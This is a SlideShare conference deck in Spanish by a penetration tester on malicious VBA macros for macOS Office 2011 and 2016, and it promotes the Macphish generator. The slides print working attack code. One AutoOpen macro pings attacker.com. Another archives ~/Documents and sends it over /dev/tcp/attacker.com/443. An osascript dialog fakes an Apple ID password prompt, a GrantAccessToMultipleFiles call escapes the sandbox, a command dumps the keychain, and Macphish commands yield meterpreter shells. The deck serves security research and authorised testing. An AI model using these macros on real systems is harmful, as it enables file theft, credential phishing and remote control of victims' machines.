SlideShare uma empresa Scribd logo
1 de 57
Old fox, new tricks –
Malicious OSX/MacOS macros
are back
Paulino Calderon <@calderpwn>
calderon@websec.mx - http://calderonpale.com - http://websec.mx
$whoami
• Pruebas de Penetración, Análisis de Vulnerabilidades, Revisión de
Código Fuente y Pruebas de Ingeniería Social en Websec
(http://websec.mx/).
• Autor de libros con PacktPub (https://www.packtpub.com) y
cursos en línea con Pluralsight (https://www.pluralsight.com).
• Me gusta desarrollar software libre, experimentar con tecnologías
nuevas y buscar vulnerabilidades en software.
• Chapter leader de OWASP Riviera Maya
Un día
nuestro
objetivo
era una
empresa de
marketing…
¿De qué vamos a hablar hoy?
• Ataques con macros maliciosos para Mac
(OSX/MacOS) ”in the wild”.
• Vectores de ataques en Office 2011.
• Nuevos vectores de ataque contra Office 2016 que
funcionan a pesar de las protecciones del sandbox.
• Macphish – Nueva herramienta para generar macros
para Mac para pruebas de ingeniería social.
U.S. Allies and Rivals Digest Trump's
Victory – Carnegie Endowment for
International Peace.docm
• Descubierto en Febrero 2017.
• Al ejecutarse el macro malicioso:
• Verificaba que Little Snitch no estuviera ejecutándose.
• Descargaba Stager de EmPyre.
• Atacantes tenían acceso a todos los módulos de EmPyre.
• Patrick Wardle publicó un análisis en su sitio web. ->
https://objective-see.com/blog/blog_0x17.html
• Interesante pero este ataque no funciona si el usuario usa Office
2016.
Un poco de historia…
• Office 2008 for Mac mitigaba los macros maliciosos totalmente… al
no soportar VBA.
• En Office 2011 for Mac vuelven a soportar VBA macros.
• Debido a los serios problemas de seguridad, Office 2016 for Mac
ahora se ejecuta en un App Sandbox.
• Aunque los usuarios ejecuten el macro, ¡ya no podemos acceder a
archivos de usuario/sistema! … ¿O sí?
Versiones de Office en uso en la
actualidad
Office 2016Office 2011
Office 2011 vs Office 2016
Macros en OSX/MacOS
• Deben guardarse en un archivo
.docm.
• Requieren interacción del usuario.
• No se puede configurar Office para
que automáticamente no ejecute
macros:
• O ejecuta automáticamente todos los
macros.
• O te pregunta cada vez que abres un
macro.
Macros multiplataforma
•Condicionales en Office nos permiten crear
macros multiplataforma y detectar la versión
de Office.
•”If Mac” disponible desde Office 2011.
•MAC_OFFICE_VERSION desde Office 2016.
Macros multiplataforma
Ejecución de código malicioso con
System()
• En OSX/MacOS es posible ejecutar código malicioso
utilizando la función System() de libc.dylib.
Problemas utilizando System()
• Está técnica presenta ciertas desventajas:
• Requiere soportar ambas versiones (32/64 bits).
• No funciona en todos los sistemas.
Abusando Macscript
• La función de VBA Macscript() fue diseñada para ejecutar scripts
Applescript en documentos de Mac.
• Deprecada pero aún funciona en Office 2016.
• Office 2016 requiere que los scripts sean colocados en una carpeta
específica. Esto principalmente para evitar que macros descarguen
scripts adicionales y los ejecuten.
• Sin embargo, es posible abusar Macscript para ejecutar binarios del
sistema.
• Ojo: No todos los binarios son permitidos.
Ejecutando binarios con Macscript
Sub AutoOpen()
MacScript ("do shell script ""<binary>"" ")
End Sub
No todos los binarios son iguales
• Office 2016 no permite la ejecución de cualquier binario. Sin
embargo, podemos invocar:
• Utilidades: curl, tar, xxd, ping, nslookup y osascript.
• Interpretes de programación: Python, Ruby, Perl.
• Si el binario no está permitido, el sistema regresa este
error:
Abusando utilidades de sistema
Phone Home
Utilidades clásicas como ping o curl pueden ser utilizadas
como beacons de notificación.
Sub AutoOpen()
MacScript ("do shell script ""ping -c 1 attacker.com"" ")
End Sub
Abusando utilidades de sistema
Exfiltrando datos de usuario
Además tenemos acceso a sockets directamente:
/dev/tcp/atacante.com/443
Entonces también podemos comprimir la carpeta de
Documentos de usuario y enviarnosla:
Sub AutoOpen()
MacScript ("do shell script ""tar zcf - ~/Documents | xxd -p
>/dev/tcp/attacker.com/443"" ")
End Sub
Abusando osascript
• Osascript es una utilidad disponible en todas las Macs que
sirve para ejecutar scripts en Applescript.
• A pesar de que eventos de sistema están bloqueados,
tenemos acceso a funcionalidad para crear diálogos,
acceder al portapapeles y obtener información del
sistema.
Phishing de credenciales con
osascript
Podemos utilizar diálogos para engañar a usuarios a que
introduzcan sus credenciales y las enviamos utilizando
alguna de las técnicas descritas anteriormente.
Phishing de credenciales con
Macscript
MacScript("do shell script ""/usr/bin/osascript -e
'display dialog ""Microsoft Word requiere de tu
contraseña de tu Apple ID para descifrar el archivo"" &
return & return default answer """" with icon file
""Applications:Utilities:Keychain
Access.app:Contents:Resources:AppIcon.icns"" with
hidden answer with title ""Microsoft Word""'""")
https://drive.google.com/open?id=0BzPR8exG0kt6WWUzU0tKUjFhdjg
VIDEO
Phishing de credenciales con
osascript
• Funciona en Office 2011/2016.
• Localmente también puede ser ejecutado:
http://fuzzynop.blogspot.com/2014/10/osascript-for-local-phishing.html
• Ahora también implementado en otras herramientas:
• Bash Bunny
https://github.com/hak5/bashbunny-
payloads/tree/master/payloads/library/phishing/MacPhish
• EmPyre
https://medium.com/@malcomvetter/multi-platform-macro-
phishing-payloads-3b688e8eff68
Phishing de credenciales con
osascript
• Se puede personalizar los diálogos con íconos de
aplicaciones en el sistema.
• Applications:Utilities:Keychain
Access.app:Contents:Resources:AppIcon.icns
Abusando de los interpretes de
lenguajes de programación
Podemos ejecutar código utilizando interpretes de
lenguajes de programación (Python/Ruby/Perl):
Sub AutoOpen()
MacScript ("do shell script ""python -c <payload>"" ")
End Sub
Abusando de los interpretes de
lenguajes de programación
https://drive.google.com/open?id=0BzPR8exG0kt6TlY1UWhiemVKRnc
VIDEO
Atacando Office 2011 for Mac
Persistencia
cronjob
Dylib-hijack
Launch daemon
Login hook
Exfiltración
Curl/wget
Tar/xxd
TCP sockets
C&C
EmPyre
Meterpreter
Phishing
osascript
VBA
Macros para Office 2016
• El sandbox de Office 2016 bloquea el acceso a
cualquier recurso no definido en las políticas de
seguridad.
• Aunque los usuarios habiliten la ejecución de macros,
la mayoría de malware no va a funcionar en Office
2016.
• No se conocían vectores de ataque que funcionaran
contra Office 2016.
El sandbox de Office 2016
¿Qué podemos hacer si nos enfrentamos a usuarios con Office 2016?
Abusando de GrantAccessToMultipleFiles
• Office 2016 introdujo un par de funciones nuevas entre ellas
GrantAccessToMultipleFiles().
• GrantAccessToMultipleFiles recibe un arreglo de archivos en el
sistema y solicita permisos de acceso.
• ¡La documentación no dice nada de que carpetas también son
soportadas! ¿Para qué solicitar individualmente acceso a archivos si le
podemos pedir acceso a toda la carpeta?
• One shot: Solo tenemos una oportunidad porque la selección del
usuario es guardada para siempre.
• Esto tiene muchas implicaciones de las cuales hablaremos más
adelante.
Abusando de GrantAccessToMultipleFiles
Abusando de GrantAccessToMultipleFiles
Sub AutoOpen()
GrantAccessToMultipleFiles(”/Users/<usuario>/Documents”)
MacScript ("do shell script ""python -c <payload>"" ")
End Sub
https://drive.google.com/open?id=0BzPR8exG0kt6VzlaWVVJdEtNR0k
VIDEO
Abusando GrantAccessToMultipleFiles
Permisos globales
Debido a que el dialogo se presenta una sola vez y los
permisos son asignados para siempre:
• Si el usuario otorga los permisos, cualquier macro que
se ejecute en el sistema tendrá acceso a esos archivos.
Si los usuarios ya habían permitido a un macro
legitimo acceder a estos archivos, nuestro macro
malicioso también tendría acceso a esos archivos.
https://drive.google.com/open?id=0BzPR8exG0kt6SnJwM01KSzAzMjA
VIDEO
Abusando GrantAccessToMultipleFiles
Denegación de Servicio Permanente (DoS)
• Si el usuario no otorga los permisos, macros
legítimos no podrán acceder a esos archivos
posteriormente.
• No existe una interfaz para administrar estos
permisos. La respuesta de la primera petición se usa
para siempre.
• Posible Denegación de Servicio permanente.
Preparando los payloads maliciosos
• Payload script en Applescript debe ser escapado para ejecutarse
inline a través de osascript. Debemos considerar VBA escaping
también.
• GrantAccessToMultipleFiles requiere saber la ruta completa al
directorio del usuario objetivo. (Cambia de objetivo a objetivo)
• La ruta también la podemos obtener abusando de osascript
Macphish – Generador de macros maliciosos
para pruebas de ingeniería social
https://github.com/cldrn/macphish
Macphish
• Genera scripts en Applescript para pruebas de
ingeniería social.
• Plantillas de macros multiplataforma.
• Nombres de funciones aleatorios.
• Payloads de meterpreter y Empyre (*).
• Configuración automática de entorno de usuario.
https://github.com/cldrn/macphish
Macphish - Beacon
• Payload no malicioso que simplemente envía señal a
casa sobre su ejecución. (”Phone home”)
• Útil para estadísticas sobre ejecución de macros.
• Funciona en Office 2011 y Office 2016.
https://github.com/cldrn/macphish
$./macphish.py –a beacon –lh <host>
https://github.com/cldrn/macphish
Macphish - Creds
• Payload para intentar obtener credenciales locales de
usuarios.
• Utiliza funcionalidad de diálogos de osascript para
realizar el ataque de phishing.
• Funciona en Office 2011 y Office 2016.
https://github.com/cldrn/macphish
$./macphish.py –a creds -m –lh <host>
https://github.com/cldrn/macphish
Macphish - Meterpreter
• Payload para obtener shell de meterpreter en
víctimas.
• Utiliza payloads en python.
• Funciona en Office 2011 sin restricciones.
• Office 2016 quedamos dentro del sandbox ->
https://github.com/cldrn/macphish
$./macphish.py –a meterpreter –lh <host>
-lp <port> -m
https://github.com/cldrn/macphish
Macphish – Meterpreter c/
GrantAccessToMultipleFiles()
• Payload para solicitar permisos a los Documentos de
usuarios antes de ejecutar una shell de meterpreter.
• En Office 2016 saltamos el sandbox si:
• La víctima autoriza (o autorizó a otro archivo) el acceso a
los documentos.
• El documento se encuentra dentro de la ruta que
solicita. (*)
https://github.com/cldrn/macphish
$./macphish.py –a meterpreter-grant
–lh <host> -lp <port> -m
https://github.com/cldrn/macphish
https://drive.google.com/open?id=0BzPR8exG0kt6TDJ5OGt6LVNLT28
VIDEO
Ideas adicionales
• Automatizar la persistencia.
• Elevación de privilegios a través de vulnerabilidades
del sistema.
• Dumpeo de contraseñas a través del keychain.
• MacScript("do shell script ""security dump-keychain -d login.keychain"" ")
Ligas
• Documentación de macphish
https://github.com/cldrn/macphish/wiki
• Websec:
http://websec.mx/blog/ver/mac-macros-y-macphish
• App Sandbox:
https://developer.apple.com/library/content/documentation/Security/Conceptual/AppSandbox
DesignGuide/AboutAppSandbox/AboutAppSandbox.html
• VBA improvements in Office 2016:
https://dev.office.com/blogs/VBA-improvements-in-Office-2016
• Credential phishing in Empyre:
https://medium.com/@malcomvetter/multi-platform-macro-phishing-payloads-
3b688e8eff68
¡Gracias! ¿Preguntas?
Paulino Calderon <@calderpwn>
calderon@websec.mx - http://calderonpale.com - http://websec.mx

Mais conteúdo relacionado

Mais procurados

Desarrollando para Nmap Scripting Engine (NSE) [GuadalajaraCON 2013]
Desarrollando para Nmap Scripting Engine (NSE) [GuadalajaraCON 2013]Desarrollando para Nmap Scripting Engine (NSE) [GuadalajaraCON 2013]
Desarrollando para Nmap Scripting Engine (NSE) [GuadalajaraCON 2013]Websec México, S.C.
 
CPMX5 - Explotación masiva de vulnerabilidades en ruteadores por Pedro Joaquín
CPMX5 - Explotación masiva de vulnerabilidades en ruteadores por Pedro JoaquínCPMX5 - Explotación masiva de vulnerabilidades en ruteadores por Pedro Joaquín
CPMX5 - Explotación masiva de vulnerabilidades en ruteadores por Pedro JoaquínWebsec México, S.C.
 
Técnicas de escaneo masivo - 11/2013
Técnicas de escaneo masivo - 11/2013Técnicas de escaneo masivo - 11/2013
Técnicas de escaneo masivo - 11/2013Websec México, S.C.
 
Escribiendo firmas para el sistema de detección de versiones de Nmap
Escribiendo firmas para el sistema de detección de versiones de NmapEscribiendo firmas para el sistema de detección de versiones de Nmap
Escribiendo firmas para el sistema de detección de versiones de NmapWebsec México, S.C.
 
Abraham Pasamar & Carlos Fernández - Purple brain, purple brain ... [rooted2019]
Abraham Pasamar & Carlos Fernández - Purple brain, purple brain ... [rooted2019]Abraham Pasamar & Carlos Fernández - Purple brain, purple brain ... [rooted2019]
Abraham Pasamar & Carlos Fernández - Purple brain, purple brain ... [rooted2019]RootedCON
 
Taller: Exploración de redes con Nmap
Taller: Exploración de redes con NmapTaller: Exploración de redes con Nmap
Taller: Exploración de redes con NmapWebsec México, S.C.
 
Introducción al pentesting free security
Introducción al pentesting   free securityIntroducción al pentesting   free security
Introducción al pentesting free securityAntonio Toriz
 
Daniel González & Helena Jalain - DevSecOps y la caída de Babilonia: cómo olv...
Daniel González & Helena Jalain - DevSecOps y la caída de Babilonia: cómo olv...Daniel González & Helena Jalain - DevSecOps y la caída de Babilonia: cómo olv...
Daniel González & Helena Jalain - DevSecOps y la caída de Babilonia: cómo olv...RootedCON
 
Cuckoo sandbox
Cuckoo sandboxCuckoo sandbox
Cuckoo sandboxTensor
 
Carlos Brendel - Sobreviviendo al exterior con tu IPS [rooted2018]
Carlos Brendel - Sobreviviendo al exterior con tu IPS [rooted2018]Carlos Brendel - Sobreviviendo al exterior con tu IPS [rooted2018]
Carlos Brendel - Sobreviviendo al exterior con tu IPS [rooted2018]RootedCON
 
Javier Marcos - Detección de amenazas a escala con osquery [rooted2019]
Javier Marcos - Detección de amenazas a escala con osquery [rooted2019]Javier Marcos - Detección de amenazas a escala con osquery [rooted2019]
Javier Marcos - Detección de amenazas a escala con osquery [rooted2019]RootedCON
 
Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro Villaverde
Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro VillaverdeRooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro Villaverde
Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro VillaverdeRootedCON
 
Gerardo Garcia Peña - Crypto Goofs... [rooted2018]
Gerardo Garcia Peña - Crypto Goofs... [rooted2018]Gerardo Garcia Peña - Crypto Goofs... [rooted2018]
Gerardo Garcia Peña - Crypto Goofs... [rooted2018]RootedCON
 
Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...
Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...
Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...RootedCON
 
Rooted2020 hunting malware-using_process_behavior-roberto_amado
Rooted2020 hunting malware-using_process_behavior-roberto_amadoRooted2020 hunting malware-using_process_behavior-roberto_amado
Rooted2020 hunting malware-using_process_behavior-roberto_amadoRootedCON
 
rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...
rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...
rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...RootedCON
 
Rooted2020 virtual pwned-network_-_manel_molina
Rooted2020 virtual pwned-network_-_manel_molinaRooted2020 virtual pwned-network_-_manel_molina
Rooted2020 virtual pwned-network_-_manel_molinaRootedCON
 
Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]
Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]
Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]RootedCON
 

Mais procurados (20)

Desarrollando para Nmap Scripting Engine (NSE) [GuadalajaraCON 2013]
Desarrollando para Nmap Scripting Engine (NSE) [GuadalajaraCON 2013]Desarrollando para Nmap Scripting Engine (NSE) [GuadalajaraCON 2013]
Desarrollando para Nmap Scripting Engine (NSE) [GuadalajaraCON 2013]
 
CPMX5 - Explotación masiva de vulnerabilidades en ruteadores por Pedro Joaquín
CPMX5 - Explotación masiva de vulnerabilidades en ruteadores por Pedro JoaquínCPMX5 - Explotación masiva de vulnerabilidades en ruteadores por Pedro Joaquín
CPMX5 - Explotación masiva de vulnerabilidades en ruteadores por Pedro Joaquín
 
Técnicas de escaneo masivo - 11/2013
Técnicas de escaneo masivo - 11/2013Técnicas de escaneo masivo - 11/2013
Técnicas de escaneo masivo - 11/2013
 
Escribiendo firmas para el sistema de detección de versiones de Nmap
Escribiendo firmas para el sistema de detección de versiones de NmapEscribiendo firmas para el sistema de detección de versiones de Nmap
Escribiendo firmas para el sistema de detección de versiones de Nmap
 
Abraham Pasamar & Carlos Fernández - Purple brain, purple brain ... [rooted2019]
Abraham Pasamar & Carlos Fernández - Purple brain, purple brain ... [rooted2019]Abraham Pasamar & Carlos Fernández - Purple brain, purple brain ... [rooted2019]
Abraham Pasamar & Carlos Fernández - Purple brain, purple brain ... [rooted2019]
 
Taller: Exploración de redes con Nmap
Taller: Exploración de redes con NmapTaller: Exploración de redes con Nmap
Taller: Exploración de redes con Nmap
 
Pruebas de penetración nmap
Pruebas de penetración nmapPruebas de penetración nmap
Pruebas de penetración nmap
 
Introducción al pentesting free security
Introducción al pentesting   free securityIntroducción al pentesting   free security
Introducción al pentesting free security
 
Daniel González & Helena Jalain - DevSecOps y la caída de Babilonia: cómo olv...
Daniel González & Helena Jalain - DevSecOps y la caída de Babilonia: cómo olv...Daniel González & Helena Jalain - DevSecOps y la caída de Babilonia: cómo olv...
Daniel González & Helena Jalain - DevSecOps y la caída de Babilonia: cómo olv...
 
Cuckoo sandbox
Cuckoo sandboxCuckoo sandbox
Cuckoo sandbox
 
Nmap para auditoría de redes en Linux
Nmap para auditoría de redes en LinuxNmap para auditoría de redes en Linux
Nmap para auditoría de redes en Linux
 
Carlos Brendel - Sobreviviendo al exterior con tu IPS [rooted2018]
Carlos Brendel - Sobreviviendo al exterior con tu IPS [rooted2018]Carlos Brendel - Sobreviviendo al exterior con tu IPS [rooted2018]
Carlos Brendel - Sobreviviendo al exterior con tu IPS [rooted2018]
 
Javier Marcos - Detección de amenazas a escala con osquery [rooted2019]
Javier Marcos - Detección de amenazas a escala con osquery [rooted2019]Javier Marcos - Detección de amenazas a escala con osquery [rooted2019]
Javier Marcos - Detección de amenazas a escala con osquery [rooted2019]
 
Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro Villaverde
Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro VillaverdeRooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro Villaverde
Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro Villaverde
 
Gerardo Garcia Peña - Crypto Goofs... [rooted2018]
Gerardo Garcia Peña - Crypto Goofs... [rooted2018]Gerardo Garcia Peña - Crypto Goofs... [rooted2018]
Gerardo Garcia Peña - Crypto Goofs... [rooted2018]
 
Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...
Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...
Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...
 
Rooted2020 hunting malware-using_process_behavior-roberto_amado
Rooted2020 hunting malware-using_process_behavior-roberto_amadoRooted2020 hunting malware-using_process_behavior-roberto_amado
Rooted2020 hunting malware-using_process_behavior-roberto_amado
 
rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...
rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...
rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...
 
Rooted2020 virtual pwned-network_-_manel_molina
Rooted2020 virtual pwned-network_-_manel_molinaRooted2020 virtual pwned-network_-_manel_molina
Rooted2020 virtual pwned-network_-_manel_molina
 
Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]
Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]
Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]
 

Semelhante a Malicious OSX Macros Return - New Attack Vectors for Office 2016

Memoria Pruebas de intrusion mediante Metasploit Framework
Memoria Pruebas de intrusion mediante Metasploit FrameworkMemoria Pruebas de intrusion mediante Metasploit Framework
Memoria Pruebas de intrusion mediante Metasploit FrameworkErlaitzParreoMuoz
 
Webinar Gratuito: Analizar una Imagen RAM con Volatility Framework
Webinar Gratuito: Analizar una Imagen RAM con Volatility FrameworkWebinar Gratuito: Analizar una Imagen RAM con Volatility Framework
Webinar Gratuito: Analizar una Imagen RAM con Volatility FrameworkAlonso Caballero
 
Webinar Gratuito: "Tomar Control de un Servidor con Armitage"
Webinar Gratuito: "Tomar Control de un Servidor con Armitage"Webinar Gratuito: "Tomar Control de un Servidor con Armitage"
Webinar Gratuito: "Tomar Control de un Servidor con Armitage"Alonso Caballero
 
Armitage pruebas
Armitage pruebasArmitage pruebas
Armitage pruebasTensor
 
Hardware-software Intenalco ADM-Grupo-B
Hardware-software Intenalco ADM-Grupo-BHardware-software Intenalco ADM-Grupo-B
Hardware-software Intenalco ADM-Grupo-BIvonneMeneses3
 
HerramientasExplotacion-GRUPO5.pptx
HerramientasExplotacion-GRUPO5.pptxHerramientasExplotacion-GRUPO5.pptx
HerramientasExplotacion-GRUPO5.pptxJhoseC1
 
Azure Storage y Xamarin - Tec Tianguistenco
Azure Storage y Xamarin - Tec TianguistencoAzure Storage y Xamarin - Tec Tianguistenco
Azure Storage y Xamarin - Tec Tianguistencoenriqueaguilar
 
2 Aplicaciones prácticas de software libre
2 Aplicaciones prácticas de software libre2 Aplicaciones prácticas de software libre
2 Aplicaciones prácticas de software libreOpen Xarxes coop. v.
 
Diferncia las funciones del sistema operativo
Diferncia las funciones del sistema operativoDiferncia las funciones del sistema operativo
Diferncia las funciones del sistema operativoMartin Araiza Meza
 
Armitage pruebas
Armitage pruebasArmitage pruebas
Armitage pruebasTensor
 
Armitage pruebas
Armitage pruebasArmitage pruebas
Armitage pruebasTensor
 
Webinar Gratuito: Metasploit Framework
Webinar Gratuito: Metasploit FrameworkWebinar Gratuito: Metasploit Framework
Webinar Gratuito: Metasploit FrameworkAlonso Caballero
 
Los sistemas operativos
Los sistemas operativosLos sistemas operativos
Los sistemas operativospablito1103
 
Diapositivas informatica y telematica
Diapositivas informatica y telematicaDiapositivas informatica y telematica
Diapositivas informatica y telematicakajumialma12
 
03 de Marzo 2015: Andrés Villarreal - Herramientas del Desarrollador Moderno
03 de Marzo 2015: Andrés Villarreal - Herramientas del Desarrollador Moderno03 de Marzo 2015: Andrés Villarreal - Herramientas del Desarrollador Moderno
03 de Marzo 2015: Andrés Villarreal - Herramientas del Desarrollador Modernowpargentina
 
Manejo de macros[1]
Manejo de macros[1]Manejo de macros[1]
Manejo de macros[1]paoalzate
 

Semelhante a Malicious OSX Macros Return - New Attack Vectors for Office 2016 (20)

Memoria Pruebas de intrusion mediante Metasploit Framework
Memoria Pruebas de intrusion mediante Metasploit FrameworkMemoria Pruebas de intrusion mediante Metasploit Framework
Memoria Pruebas de intrusion mediante Metasploit Framework
 
Webinar Gratuito: Analizar una Imagen RAM con Volatility Framework
Webinar Gratuito: Analizar una Imagen RAM con Volatility FrameworkWebinar Gratuito: Analizar una Imagen RAM con Volatility Framework
Webinar Gratuito: Analizar una Imagen RAM con Volatility Framework
 
Webinar Gratuito: "Tomar Control de un Servidor con Armitage"
Webinar Gratuito: "Tomar Control de un Servidor con Armitage"Webinar Gratuito: "Tomar Control de un Servidor con Armitage"
Webinar Gratuito: "Tomar Control de un Servidor con Armitage"
 
Cpods training-metasploit
Cpods training-metasploitCpods training-metasploit
Cpods training-metasploit
 
Armitage pruebas
Armitage pruebasArmitage pruebas
Armitage pruebas
 
Hardware-software
Hardware-softwareHardware-software
Hardware-software
 
Hardware-software Intenalco ADM-Grupo-B
Hardware-software Intenalco ADM-Grupo-BHardware-software Intenalco ADM-Grupo-B
Hardware-software Intenalco ADM-Grupo-B
 
HerramientasExplotacion-GRUPO5.pptx
HerramientasExplotacion-GRUPO5.pptxHerramientasExplotacion-GRUPO5.pptx
HerramientasExplotacion-GRUPO5.pptx
 
Azure Storage y Xamarin - Tec Tianguistenco
Azure Storage y Xamarin - Tec TianguistencoAzure Storage y Xamarin - Tec Tianguistenco
Azure Storage y Xamarin - Tec Tianguistenco
 
2 Aplicaciones prácticas de software libre
2 Aplicaciones prácticas de software libre2 Aplicaciones prácticas de software libre
2 Aplicaciones prácticas de software libre
 
Diferncia las funciones del sistema operativo
Diferncia las funciones del sistema operativoDiferncia las funciones del sistema operativo
Diferncia las funciones del sistema operativo
 
Armitage pruebas
Armitage pruebasArmitage pruebas
Armitage pruebas
 
Armitage pruebas
Armitage pruebasArmitage pruebas
Armitage pruebas
 
Macros
MacrosMacros
Macros
 
Macros
MacrosMacros
Macros
 
Webinar Gratuito: Metasploit Framework
Webinar Gratuito: Metasploit FrameworkWebinar Gratuito: Metasploit Framework
Webinar Gratuito: Metasploit Framework
 
Los sistemas operativos
Los sistemas operativosLos sistemas operativos
Los sistemas operativos
 
Diapositivas informatica y telematica
Diapositivas informatica y telematicaDiapositivas informatica y telematica
Diapositivas informatica y telematica
 
03 de Marzo 2015: Andrés Villarreal - Herramientas del Desarrollador Moderno
03 de Marzo 2015: Andrés Villarreal - Herramientas del Desarrollador Moderno03 de Marzo 2015: Andrés Villarreal - Herramientas del Desarrollador Moderno
03 de Marzo 2015: Andrés Villarreal - Herramientas del Desarrollador Moderno
 
Manejo de macros[1]
Manejo de macros[1]Manejo de macros[1]
Manejo de macros[1]
 

Mais de Websec México, S.C.

Ciberseguridad durante la pandemia [Paulino Calderon]
Ciberseguridad durante la pandemia [Paulino Calderon]Ciberseguridad durante la pandemia [Paulino Calderon]
Ciberseguridad durante la pandemia [Paulino Calderon]Websec México, S.C.
 
Estadisticas de redes 802.11 en Mexico (2013) por Paulino Calderon
Estadisticas de redes 802.11 en Mexico (2013) por Paulino CalderonEstadisticas de redes 802.11 en Mexico (2013) por Paulino Calderon
Estadisticas de redes 802.11 en Mexico (2013) por Paulino CalderonWebsec México, S.C.
 
Mi experiencia en el programa Google Summer of Code
Mi experiencia en el programa Google Summer of CodeMi experiencia en el programa Google Summer of Code
Mi experiencia en el programa Google Summer of CodeWebsec México, S.C.
 
El porqué está fallando tu programa de seguridad informática por Paulino Cald...
El porqué está fallando tu programa de seguridad informática por Paulino Cald...El porqué está fallando tu programa de seguridad informática por Paulino Cald...
El porqué está fallando tu programa de seguridad informática por Paulino Cald...Websec México, S.C.
 
Pwning corporate networks in a single day by Paulino Calderon Pale
Pwning corporate networks in a single day by Paulino Calderon PalePwning corporate networks in a single day by Paulino Calderon Pale
Pwning corporate networks in a single day by Paulino Calderon PaleWebsec México, S.C.
 
CPMX7 Pwneando redes informáticas por Paulino Calderon
CPMX7 Pwneando redes informáticas por Paulino CalderonCPMX7 Pwneando redes informáticas por Paulino Calderon
CPMX7 Pwneando redes informáticas por Paulino CalderonWebsec México, S.C.
 
Explotación práctica de señales de radio por Luis Colunga
Explotación práctica de señales de radio por Luis ColungaExplotación práctica de señales de radio por Luis Colunga
Explotación práctica de señales de radio por Luis ColungaWebsec México, S.C.
 
Recuperacion de defaces con versionador Git por Alevsk
Recuperacion de defaces con versionador Git por Alevsk Recuperacion de defaces con versionador Git por Alevsk
Recuperacion de defaces con versionador Git por Alevsk Websec México, S.C.
 
Seguridad en Bitcoin por Luis Daniel Beltran
Seguridad en Bitcoin por Luis Daniel BeltranSeguridad en Bitcoin por Luis Daniel Beltran
Seguridad en Bitcoin por Luis Daniel BeltranWebsec México, S.C.
 
CPMX5 - Las nuevas generaciones de redes por Luis Colunga
CPMX5 - Las nuevas generaciones de redes por Luis ColungaCPMX5 - Las nuevas generaciones de redes por Luis Colunga
CPMX5 - Las nuevas generaciones de redes por Luis ColungaWebsec México, S.C.
 
CPMX5 - (IN)seguridad en infraestructura tecnológica por Paulino Calderón
CPMX5 - (IN)seguridad en infraestructura tecnológica por Paulino CalderónCPMX5 - (IN)seguridad en infraestructura tecnológica por Paulino Calderón
CPMX5 - (IN)seguridad en infraestructura tecnológica por Paulino CalderónWebsec México, S.C.
 
Drive by subdomain router pharming (2012)
Drive by subdomain router pharming (2012)Drive by subdomain router pharming (2012)
Drive by subdomain router pharming (2012)Websec México, S.C.
 
Teensy para pentesters y locos (2010)
Teensy para pentesters y locos (2010)Teensy para pentesters y locos (2010)
Teensy para pentesters y locos (2010)Websec México, S.C.
 
Desarrollo de rootkits en Linux [GuadalajaraCON 2013]
Desarrollo de rootkits en Linux [GuadalajaraCON 2013]Desarrollo de rootkits en Linux [GuadalajaraCON 2013]
Desarrollo de rootkits en Linux [GuadalajaraCON 2013]Websec México, S.C.
 
Vulnerabilidades en tecnologías NFC y RFID [GuadalajaraCON 2013]
Vulnerabilidades en tecnologías NFC y RFID [GuadalajaraCON 2013]Vulnerabilidades en tecnologías NFC y RFID [GuadalajaraCON 2013]
Vulnerabilidades en tecnologías NFC y RFID [GuadalajaraCON 2013]Websec México, S.C.
 
Desarrollo de exploit para infraestructura crítica [GuadalajaraCON 2013]
Desarrollo de exploit para infraestructura crítica [GuadalajaraCON 2013]Desarrollo de exploit para infraestructura crítica [GuadalajaraCON 2013]
Desarrollo de exploit para infraestructura crítica [GuadalajaraCON 2013]Websec México, S.C.
 

Mais de Websec México, S.C. (19)

Ciberseguridad durante la pandemia [Paulino Calderon]
Ciberseguridad durante la pandemia [Paulino Calderon]Ciberseguridad durante la pandemia [Paulino Calderon]
Ciberseguridad durante la pandemia [Paulino Calderon]
 
Estadisticas de redes 802.11 en Mexico (2013) por Paulino Calderon
Estadisticas de redes 802.11 en Mexico (2013) por Paulino CalderonEstadisticas de redes 802.11 en Mexico (2013) por Paulino Calderon
Estadisticas de redes 802.11 en Mexico (2013) por Paulino Calderon
 
Mi experiencia en el programa Google Summer of Code
Mi experiencia en el programa Google Summer of CodeMi experiencia en el programa Google Summer of Code
Mi experiencia en el programa Google Summer of Code
 
